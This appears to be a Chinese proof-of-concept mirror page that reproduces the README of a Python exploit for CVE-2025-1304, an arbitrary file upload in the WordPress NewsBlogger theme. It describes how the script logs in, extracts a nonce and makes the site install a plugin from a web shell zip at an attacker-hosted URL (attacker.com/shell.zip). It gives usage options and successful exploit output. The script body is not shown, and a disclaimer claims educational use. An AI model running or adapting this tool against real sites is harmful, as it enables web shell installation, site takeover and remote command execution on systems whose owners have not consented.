关联漏洞
标题:
WordPress plugin NewsBlogger 安全漏洞
(CVE-2025-1304)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin NewsBlogger 0.2.5.1及之前版本存在安全漏洞,该漏洞源于缺少能力检查,可能导致任意文件上传。
描述
WordPress NewsBlogger Theme <= 0.2.5.1 is vulnerable to Arbitrary File Upload
介绍
# 🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - Arbitrary File Upload (CVE-2025-1304)
**CVSS Score:** 8.8 (High)
**Vulnerability Type:** Arbitrary File Upload
**Component:** WordPress Theme
**CVE ID:** CVE-2025-1304
---
## 🔥 Vulnerability Overview
The `NewsBlogger` WordPress theme (versions <= 0.2.5.1) is vulnerable to an **Arbitrary File Upload** via the admin welcome panel.
This vulnerability allows any authenticated user — including those with the minimal **Subscriber** role — to upload a malicious `.zip` archive containing a web shell.
The upload occurs through an unvalidated plugin URL field, which fails to properly verify the content or type of the uploaded file.
A successful attack could lead to full compromise of the website, including remote command execution and privilege escalation.
---
## 🧠 Script Details
This Python script automates the exploitation of the vulnerability by:
- Logging in using supplied admin credentials.
- Extracting the `nonce` dynamically from the vulnerable welcome page.
- Uploading a remote malicious plugin via the vulnerable AJAX endpoint.
---
## ⚙️ Usage Instructions
```bash
python CVE-2025-1304.py -h
```
```text
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
```
---
## 📤 Example Output
```text
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
```
---
## ⚠️ Disclaimer
This code is provided for **educational and authorized security testing** purposes only.
The author assumes no responsibility for any misuse or damage caused by this tool.
---
*By: Nxploited ( Khaled Alenazi)*
文件快照
[4.0K] /data/pocs/e510112dff126fe49cc5398477070cf7769a380f
├── [2.8K] CVE-2025-1304.py
├── [1.1K] LICENSE
├── [2.4K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。